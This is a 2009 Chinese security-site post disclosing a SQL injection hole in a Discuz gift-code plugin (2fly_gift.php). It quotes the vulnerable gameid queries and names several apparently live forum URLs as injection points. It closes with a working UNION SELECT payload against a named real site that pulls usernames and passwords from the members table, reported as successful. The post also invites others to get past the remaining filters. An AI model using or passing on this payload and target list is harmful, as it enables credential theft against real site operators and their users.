频道栏目
首页 > 安全 > 网站安全 > 正文

discuz插件账号发放系统注入0day

2009-08-14 23:21:02           
收藏   我要投稿

插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php(只说最新版)
作者:CN.Tnik&Tojen(俺俩老乡 )

代码分析:
主要是gameid参数没有过滤导致注入出现
1. output分支下的gameid普通浏览复制代码打印代码
$query = $db->query("Select * FROM `{$tablepre}2fly_gift` Where `id` = $gameid LIMIT 1");  
    $game = $db->fetch_array($query); 

$query = $db->query("Select * FROM `{$tablepre}2fly_gift` Where `id` = $gameid LIMIT 1");
    $game = $db->fetch_array($query);明显没有过滤,注入出现,但是由于没有数据显示位,导致注入返回的数据看不到,有点鸡肋
http://www.klcwsj.com/2fly_gift.php?action=output&gameid=45
http://bbs.yeswan.com/2fly_gift.php?action=output&gameid=16
但是union后没有数据显示位,但不到数据
2. Sponsors分支下的gameid也没有过滤:普通浏览复制代码打印代码
$query = $db->query("Select id,good_names,acc,total,remain,record,expiration FROM `{$tablepre}2fly_gift` Where `id` = $gameid LIMIT 1");  
        $game = $db->fetch_array($query); 

$query = $db->query("Select id,good_names,acc,total,remain,record,expiration FROM `{$tablepre}2fly_gift` Where `id` = $gameid LIMIT 1");
        $game = $db->fetch_array($query);http://bbs.yeswan.com/2fly_gift. ... ecord&gameid=17
明显注入,原以为可以利用,但是意外又出现了:普通浏览复制代码打印代码
$recordb = explode(||, $game[record]);  
        $acc2 = explode(" ", $game[acc]);  
        $remain = $game[remain];  
        $remain2 = $game[remain] + 1;  
 
        /*分析已领取会员的uid*/ 
        foreach ($recordb as $recordnow)  
        {  
            $recordc = explode(_, $recordnow);  
            $recordd[] = substr($recordc[0], 1);  
            $tsbuserID[] = $recordc[0];  
            $tsbfafang[] = $recordc[1];  
            $randomPW[] = $recordc[2];  
            $checkboxTsb[] = $recordc[3];  
            if (substr($recordc[0], 1) != )  
            {  
                if ($recordc[0])  
                    $uids .= , . substr($recordc[0], 1);  
            }  
 
        }  
 
 
        $table .= "<form name=form1 method=post action=2fly_gift.php?action=Sponsors&pages=view_record_edit&gameid=" .  
            $gameid . ">";  
 
        /*读取用户名称*/ 
        $uidss = array();  
        $uidquery = $db->query("Select uid, username FROM {$tablepre}members Where uid IN (" .  
            substr($uids, 1) . ") orDER BY uid ASC"); 

$recordb = explode(||, $game[record]);
        $acc2 = explode(" ", $game[acc]);
        $remain = $game[remain];
        $remain2 = $game[remain] + 1;

        /*分析已领取会员的uid*/
        foreach ($recordb as $recordnow)
        {
            $recordc = explode(_, $recordnow);
            $recordd[] = substr($recordc[0], 1);
            $tsbuserID[] = $recordc[0];
            $tsbfafang[] = $recordc[1];
            $randomPW[] = $recordc[2];
            $checkboxTsb[] = $recordc[3];
            if (substr($recordc[0], 1) != )
            {
                if ($recordc[0])
                    $uids .= , . substr($recordc[0], 1);
            }

        }


        $table .= "<form name=form1 method=post action=2fly_gift.php?action=Sponsors&pages=view_record_edit&gameid=" .
            $gameid . ">";

        /*读取用户名称*/
        $uidss = array();
        $uidquery = $db->query("Select uid, username FROM {$tablepre}members Where uid IN (" .
            substr($uids, 1) . ") orDER BY uid ASC");只要加上and 1=2 $uids就空了,出错了,拦在这儿了,还是显示不出数据,其他的地方的就不说了,看看大牛们有没有好的方法突破,里面还有些update的sql,不知道能不能利用。
不过以前的版本还是可以的:
有个content分支:
http://www.iacct.cn/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,

0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
成功爆出密码

相关TAG标签 账号 插件 系统
上一篇:PHP漏洞挖掘的一点思路
下一篇:枫叶贴吧管理系统提权
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站